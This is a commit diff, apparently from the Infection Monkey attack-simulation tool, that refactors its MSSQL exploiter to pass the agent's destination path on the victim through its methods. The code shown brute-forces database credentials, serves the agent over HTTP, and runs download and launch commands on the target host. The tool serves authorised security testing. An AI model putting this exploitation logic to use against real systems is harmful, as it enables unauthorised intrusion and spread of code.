Agent: User random binary destination path for MSSQL Exploit

2022-03-23 17:21:53 +01:00 · 2022-03-23 17:21:53 +01:00 · 51cfb73ce0
parent cad5fa4897
commit 51cfb73ce0
1 changed files with 21 additions and 19 deletions
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@ -1,5 +1,6 @@
 import logging
 import os
+from pathlib import Path
 from time import sleep

 import pymssql
@ -59,6 +60,8 @@ class MSSQLExploiter(HostExploiter):
        Also, don't forget to start_monkey_server() before self.upload_monkey() and
        self.stop_monkey_server() after
        """
+        monkey_path_on_victim = get_agent_dest_path(self.host, self.options)
+
        # Brute force to get connection
        creds = generate_identity_secret_pairs(
            self.options["credentials"]["exploit_user_list"],
@ -82,14 +85,14 @@ class MSSQLExploiter(HostExploiter):
            self.create_temp_dir()
            self.create_empty_payload_file()

-            http_thread = self.start_monkey_server()
-            self.upload_monkey()
+            http_thread = self.start_monkey_server(monkey_path_on_victim)
+            self.upload_monkey(monkey_path_on_victim)
            MSSQLExploiter._stop_monkey_server(http_thread)

            # Clear payload to pass in another command
            self.create_empty_payload_file()

-            self.run_monkey()
+            self.run_monkey(monkey_path_on_victim)

            self.remove_temp_dir()
        except Exception as e:
@ -129,8 +132,8 @@ class MSSQLExploiter(HostExploiter):
            raise Exception("Couldn't execute MSSQL exploiter because payload was too long")
        self.run_mssql_commands(array_of_commands)

-    def run_monkey(self):
-        monkey_launch_command = self.get_monkey_launch_command()
+    def run_monkey(self, monkey_path_on_victim: Path):
+        monkey_launch_command = self.get_monkey_launch_command(monkey_path_on_victim)
        self.run_mssql_command(monkey_launch_command)
        self.run_payload_file()

@ -139,8 +142,8 @@ class MSSQLExploiter(HostExploiter):
            self.cursor.execute(cmd)
            sleep(MSSQLExploiter.QUERY_BUFFER)

-    def upload_monkey(self):
-        monkey_download_command = self.write_download_command_to_payload()
+    def upload_monkey(self, monkey_path_on_victim: Path):
+        monkey_download_command = self.write_download_command_to_payload(monkey_path_on_victim)
        self.run_payload_file()
        self.add_executed_cmd(monkey_download_command.command)

@ -155,10 +158,9 @@ class MSSQLExploiter(HostExploiter):
        )
        self.run_mssql_command(tmp_dir_removal_command)

-    def start_monkey_server(self) -> LockedHTTPServer:
-        dst_path = get_agent_dest_path(self.host, self.options)
+    def start_monkey_server(self, monkey_path_on_victim: Path) -> LockedHTTPServer:
        self.agent_http_path, http_thread = HTTPTools.create_locked_transfer(
-            self.host, dst_path, self.agent_repository
+            self.host, str(monkey_path_on_victim), self.agent_repository
        )
        return http_thread

@ -167,27 +169,27 @@ class MSSQLExploiter(HostExploiter):
        http_thread.stop()
        http_thread.join(LONG_REQUEST_TIMEOUT)

-    def write_download_command_to_payload(self):
-        monkey_download_command = self.get_monkey_download_command()
+    def write_download_command_to_payload(self, monkey_path_on_victim: Path):
+        monkey_download_command = self.get_monkey_download_command(monkey_path_on_victim)
        self.run_mssql_command(monkey_download_command)
        return monkey_download_command

-    def get_monkey_launch_command(self):
-        dst_path = get_agent_dest_path(self.host, self.options)
+    def get_monkey_launch_command(self, monkey_path_on_victim: Path):
        # Form monkey's launch command
-        monkey_args = build_monkey_commandline(self.host, self.current_depth - 1, dst_path)
+        monkey_args = build_monkey_commandline(
+            self.host, self.current_depth - 1, monkey_path_on_victim
+        )
        suffix = ">>{}".format(self.payload_file_path)
        prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
        return MSSQLLimitedSizePayload(
-            command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args),
+            command="{} {} {}".format(monkey_path_on_victim, DROPPER_ARG, monkey_args),
            prefix=prefix,
            suffix=suffix,
        )

-    def get_monkey_download_command(self):
-        dst_path = get_agent_dest_path(self.host, self.options)
+    def get_monkey_download_command(self, monkey_path_on_victim: Path):
        monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format(
-            http_path=self.agent_http_path, dst_path=dst_path
+            http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim)
        )
        prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
        suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(